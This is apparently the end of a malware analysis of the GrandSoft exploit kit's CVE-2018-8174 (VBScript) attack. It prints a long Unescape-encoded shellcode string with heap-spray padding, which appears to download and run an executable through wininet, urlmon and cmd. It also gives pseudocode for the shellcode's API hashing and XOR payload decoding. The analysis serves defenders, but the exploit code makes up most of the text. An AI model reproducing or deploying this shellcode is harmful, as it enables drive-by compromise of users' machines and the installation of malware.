G00001152223246=Unescape(""& U109 &"0000"& U109 &"0000"& U109 &"0000"& U109 &"0000") &Unescape(""& U109 &"9CE9"& U109 &"0002"& U109 &"3100"& U109 &"64C9"& U109 &"718B"& U109 &"8B30"& U109 &"0C76"& U109 &"768B"& U109 &"8B1C"& U109 &"086E"& U109 &"468B"& U109 &"8B20"& U109 &"6636"& U109 &"4839"& U109 &"7518"& U109 &"8BF2"& U109 &"3C45"& U109 &"548B"& U109 &"7805"& U109 &"EA01"& U109 &"728B"& U109 &"0120"& U109 &"52EE"& U109 &"C931"& U109 &"4149"& U109 &"01AD"& U109 &"31E8"& U109 &"0FDB"& U109 &"10BE"& U109 &"F238"& U109 &"0874"& U109 &"CBC1"& U109 &"010E%u40D3"& UF1 &"1EB%u1F3B%uE775%u8B5A%u2472%uEE01%u8B66%u4E0C%u728B%u011C%u8BEE%u8E04"& U88 &"01%uC3AB"& U88 &"5F"& UF1 &"F9F"& UF1 &"FFF%uB4E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"FAF"& UF1 &"FFF%uAAE8"& UF1 &"FFF"& U88 &"FF"& UF1 &"FA5"& UF1 &"FFF%uA0E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F9B"& UF1 &"FFF%u96E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F91"& UF1 &"FFF%u3368%u0032%u6800%u7375%u7265"& UF1 &"F54"& UF1 &"C57%uC589%u7CE8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F77"& UF1 &"FFF%u6E68%u7465%u6800%u6977%u696E"& UF1 &"F54"& UF1 &"457%uC589%u62E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F5D"& UF1 &"FFF%u58E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F53"& UF1 &"FFF%u4EE8"& UF1 &"FFF%u6AFF%u6840%u1000%u0000%u0068%u07D0%u6A00"& UF1 &"F00%uC457%u0789%uC689%u57FF%u89CC%u8106%u00C6%u0010%u5600%u0068%u0008"& UF1 &"F00%uC857%u078B"& UF1 &"B89%uC383%u8904%u83F9%u6DE9%uC689%uC683"& UF1 &"F08%u5330%u5651%u57FF%u8BE8%u8907%u81C3%u00C3%u0010%u8900%u83F9%u67E9%u30FF%u5153"& UF1 &"F53%uE457%u378B%uC683%u6A08%u6A00%u6A00%u6A00%u5600%u57FF%u89EC%uEC47%u006A%u006A%u006A%u006A"& UF1 &"F56%uEC77%u57FF%u89F0"& UF1 &"047%u078B%u0005%u0010%u6A00%u6A00%u6A50%u6A02%u6A00%u6802%u0000%u4000"& UF1 &"F50%uD457%u4789%u8BD4%u8137%u08C6%u0023%uC700"& UF1 &"846%u0001%u0000%u078B%u188B%u7E83%u00F8%u4074"& UF1 &"089"& U88 &"83%u5008%u0068%u0004%u5600%u77FF"& UF1 &"FF0"& UF1 &"857%u7E83%u00F8%u2874%u4E8B%u89F8%u48F0%u8140%uAAC3%u0000%u8000%u48F3%u1830"& UF1 &"2E2"& UF1 &"089"& U88 &"83%u6A04%u5000%u76FF%u56F8%u77FF"& UF1 &"FD4%uD857%uBAEB%u77FF"& UF1 &"FD4%uDC57%u77FF"& UF1 &"FF0"& UF1 &"C57%u77FF"& UF1 &"FEC"& UF1 &"C57"& UF1 &"B89%uEB83%u8B4D%u0507%u1000%u0000"& UF1 &"989%uE983%u8B7B%u812F%u00C5%u0030%u5000%u5153"& UF1 &"F55%uE457%u6C68%u3233%u6800%u6873%u6C65"& UF1 &"F54%uE057%u9090%u9090%u8990%u83C5%u04EF%u07C7%u065A%u4C98%u04E8"& UF1 &"FFE%u8BFF%u8137%u00C6%u0010%u8B00%u0507%u3000%u0000"& UF1 &"B89%uEB83%u8955%u81FE%u83EE%u0000%u8900%u81F9%u8FE9%u0000%u6A00%u6A01%u5000%u5156%u006A%u57FF%u83FC%u05F8%uD374%u006A"& UF1 &"E6A%u57FF%u72C0%u7500%u6E00%u6100%u7300%u0000%u6300%u6D00%u6400%u0000%u2500%u7300%u2200%u2500%u7300%u2200%u0000%u2500%u2F73%u6425%u2500%u7300%u2500%u6400%u2E00%u6500%u7800%u6500%u0000%u6300%u6D00%u6400%u2000%u2F00%u4300%u2000%u0000"& U88 &"00"& UF1 &"DBA"& UF1 &"FFF%u6FD0%u26FD%u6F8A%u13C6%u3B42%u208B%u8E70%u1022%uB1AD%u4F89%u8EF8"& UF1 &"470"& UF1 &"C13%u638D%uB973%u01D5%u1DF9%uA97F%u70B5%uA596%u709F%uA596%uC2C2%uBE70%uA391%uB75F%uAE00%uBCB9%uE926%u639E%uD37E%u88A8%u0000%u0000" & outStr ) | |
G00001152223246=G00001152223246 & String((&h80000-LenB(G00001152223246))/2,Unescape("%u4141")) | |
c111111=G00001152223246 | |
End Function |
Shellcode
Shellcode calls API using hash, however this hash differs from well-known one.
Shellcode Hash Algorithm is ror14AddHash32.
pseudocode is as follows:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
acc := 0; | |
for c in input_string { | |
acc := ROR(acc, 14); | |
acc := acc + c; | |
} |
Shellcode uses GetTickCount function to generate keys.
Decoding algorithm was not changed as of vbs.
pseudocode is as follows:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
for ($i = 0; $i < strlen($enc_binary); $i++) { | |
$key = ($key + 0xAA) & 0xFF; | |
$key = $key ^ 0x48; | |
$data[] = chr(ord($enc_binary[$i]) ^ $key); | |
} |
Conclusion
GrandSoft got CVE-2018-8174. This may be a bit more powerful. Shellcode is a little characteristic. Enjoy analysis of shellcode!